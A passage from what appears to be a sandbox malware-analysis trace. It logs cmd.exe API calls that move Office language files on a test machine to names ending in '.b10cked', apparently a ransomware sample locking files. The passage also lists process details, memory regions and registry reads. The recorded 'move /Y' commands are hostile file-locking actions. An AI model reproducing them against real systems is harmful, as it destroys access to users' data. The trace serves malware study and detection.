(_String1="move", _String2="RD") returned -5 [0158.069] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0158.069] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0158.069] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0158.069] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0158.069] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0158.069] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0158.069] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0158.069] _wcsicmp (_String1="move", _String2="VER") returned -9 [0158.069] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0158.069] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0158.069] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0158.069] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0158.069] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0158.069] _wcsicmp (_String1="move", _String2="START") returned -6 [0158.069] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0158.069] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0158.069] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0158.070] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.070] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.070] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f19c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f194, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f194*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0158.072] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0158.072] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0158.072] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0158.072] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0158.072] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0158.072] _wcsicmp (_String1="PPINTL~2.TRX", _String2=".") returned 66 [0158.072] _wcsicmp 
(_String1="PPINTL~2.TRX", _String2="..") returned 66 [0158.072] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl~2.trx")) returned 0x2020 [0158.072] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.072] SetErrorMode (uMode=0x0) returned 0x0 [0158.072] SetErrorMode (uMode=0x1) returned 0x0 [0158.072] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x26eb24, lpFilePart=0x26eb0c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", lpFilePart=0x26eb0c*="PPINTL~2.TRX") returned 0x3c [0158.072] SetErrorMode (uMode=0x0) returned 0x1 [0158.073] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0158.073] _wcsicmp (_String1="PPINTL~2.TRX", _String2=".") returned 66 [0158.073] _wcsicmp (_String1="PPINTL~2.TRX", _String2="..") returned 66 [0158.073] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl~2.trx")) returned 0x2020 [0158.073] SetErrorMode (uMode=0x0) returned 0x0 [0158.073] SetErrorMode (uMode=0x1) returned 0x0 [0158.073] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x26efa0, lpFilePart=0x26ed38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", lpFilePart=0x26ed38*="PPINTL~2.TRX") returned 0x3c [0158.073] SetErrorMode (uMode=0x0) returned 0x1 [0158.073] SetErrorMode (uMode=0x0) returned 0x0 [0158.073] SetErrorMode (uMode=0x1) returned 0x0 [0158.073] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26f1a8, lpFilePart=0x26ed38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked", lpFilePart=0x26ed38*="PPINTL.REST.trx_dll.b10cked") returned 0x4b [0158.073] SetErrorMode (uMode=0x0) returned 0x1 [0158.074] SetLastError (dwErrCode=0x0) [0158.074] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.rest.trx_dll.b10cked")) returned 0xffffffff [0158.074] GetLastError () returned 0x2 [0158.074] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x26e6b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e6b4) returned 0x372130 [0158.074] FindNextFileW (in: hFindFile=0x372130, lpFindFileData=0x26e6b4 | out: lpFindFileData=0x26e6b4) returned 0 [0158.074] GetLastError () returned 0x12 [0158.074] FindClose (in: hFindFile=0x372130 | out: hFindFile=0x372130) returned 1 [0158.075] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x371cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371cc0) returned 0x372130 [0158.076] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26e94c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0158.076] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x26e94c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0158.076] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.rest.trx_dll")) returned 0x2020 [0158.076] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0158.076] FindClose (in: hFindFile=0x372130 | out: hFindFile=0x372130) returned 1 [0158.077] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26e900 | out: _Buffer=" 1") returned 9 [0158.077] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.077] GetFileType (hFile=0x7) returned 0x2 [0158.077] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.077] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26e88c | out: lpMode=0x26e88c) returned 1 [0158.079] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.079] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26e8c0 | out: lpConsoleScreenBufferInfo=0x26e8c0) returned 1 [0158.079] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0158.079] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26e900 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0158.079] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x26e8e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26e8e4*=0x1a) returned 1 [0158.080] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.080] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.080] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.080] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.080] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.080] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.080] SetConsoleInputExeNameW () returned 0x1 [0158.080] GetConsoleOutputCP () returned 0x1b5 [0158.080] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.080] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.080] exit (_Code=0) Process: id = "265" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xe1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21767 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21768 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21769 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21770 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21771 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21772 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21773 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21774 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21775 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 21776 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21801 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21802 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21803 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21804 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 21805 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 21806 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21807 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21808 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21809 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21810 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21811 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21812 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21813 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21814 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21815 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21816 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21817 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21818 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21819 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21820 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21821 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 21822 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 21823 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 21824 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000011b0000" filename = "" Thread: id = 328 os_tid = 0xe70 [0158.053] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efec4 | out: lpSystemTimeAsFileTime=0x1efec4*(dwLowDateTime=0x982521c0, dwHighDateTime=0x1d440a9)) [0158.053] GetCurrentProcessId () returned 0xe1c [0158.053] GetCurrentThreadId () returned 0xe70 [0158.053] GetTickCount () returned 0x30656 [0158.053] QueryPerformanceCounter (in: lpPerformanceCount=0x1efebc | out: lpPerformanceCount=0x1efebc*=21484268071) returned 1 [0158.054] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0158.054] __set_app_type (_Type=0x1) [0158.054] __p__fmode () returned 0x76b331f4 [0158.054] __p__commode () returned 0x76b331fc [0158.055] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0158.055] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0158.055] GetCurrentThreadId () returned 0xe70 [0158.055] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe70) returned 0x38 [0158.055] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.055] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0158.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.055] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.055] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efe54 | out: phkResult=0x1efe54*=0x0) returned 0x2 [0158.055] VirtualQuery (in: lpAddress=0x1efe8b, lpBuffer=0x1efe24, dwLength=0x1c | out: lpBuffer=0x1efe24*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.056] VirtualQuery (in: 
lpAddress=0xf0000, lpBuffer=0x1efe24, dwLength=0x1c | out: lpBuffer=0x1efe24*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0158.056] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efe24, dwLength=0x1c | out: lpBuffer=0x1efe24*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0158.056] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efe24, dwLength=0x1c | out: lpBuffer=0x1efe24*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.056] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efe24, dwLength=0x1c | out: lpBuffer=0x1efe24*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.056] GetConsoleOutputCP () returned 0x1b5 [0158.056] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.056] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0158.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.056] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0158.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.056] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.057] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.057] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.057] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.057] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.057] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0158.057] GetEnvironmentStringsW () returned 0x3b0210* [0158.058] FreeEnvironmentStringsW 
(penv=0x3b0210) returned 1 [0158.058] GetEnvironmentStringsW () returned 0x3b0210* [0158.058] FreeEnvironmentStringsW (penv=0x3b0210) returned 1 [0158.058] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eedc4 | out: phkResult=0x1eedc4*=0x40) returned 0x0 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0xa0, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x1, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0x1, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x0, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x40, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x40, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0x40, 
lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.058] RegCloseKey (hKey=0x40) returned 0x0 [0158.058] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eedc4 | out: phkResult=0x1eedc4*=0x40) returned 0x0 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0x40, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x1, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0x1, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, 